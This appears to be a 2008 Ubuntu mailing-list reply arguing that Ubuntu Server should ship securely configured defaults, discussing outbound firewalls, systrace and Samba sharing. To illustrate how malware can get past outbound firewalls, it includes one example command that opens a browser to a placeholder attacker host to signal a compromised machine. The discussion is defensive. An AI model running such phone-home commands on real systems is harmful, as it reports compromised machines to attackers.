Disappointed with Ubuntu Server, could be used by such a wider audience

[John McCabe-Dansted]

On Sat, Aug 2, 2008 at 6:23 AM, Mackenzie Morgan <macoafi at gmail.com> wrote:
> Because as he said, if you pre-configure everything to
> super-duper-easy-peasy, you've also pre-configured it to
> super-duper-easy-peasy-to-crack.  I'm personally disappointed by
> firewalls that allow outbound by default, because something could phone
> home if I put my trust in an application I shouldn't, but they're
> easy-peasy for users, so that's what people do.  I can manually go
> through and fix it myself, but if some application is running about
> opening who knows how many ports and setting god-knows-what services to
> auto-start and mucking about with insecure options in config files...how
> many months is it going to take me to track all of that down?  No way.

Commercial windows firewall pretty much all block outbound traffic by
default, popping up a dialog box offering  to allow that particular
application to access the internet. I understand that it is fairly
easily for an attacker to phone home though. For example, just run
firefox http://ATTACKER/this-machine-is-cracked.

However if it good practice to prevent e.g. httpd making outgoing
connections this should be done by default. It is fairly easy to do
this with e.g. systrace.

The arguments that it is hard to step up these systems to be secure
seems to be an argument that they should be secured once, by Ubuntu,
with a great deal of scrutiny on whether the configuration really is
secure.  Even if we assume that everyone will hire a UNIX guru we
can't assume that all the "gurus" really are gurus or that they won't
forget one tiny exploit.

Ubuntu desktop already has one server function. I can right click a
file, go to share and share the folder using samba. If you know of any
security flaws with this GUI, please report a bug.

-- 
John C. McCabe-Dansted
PhD Student
University of Western Australia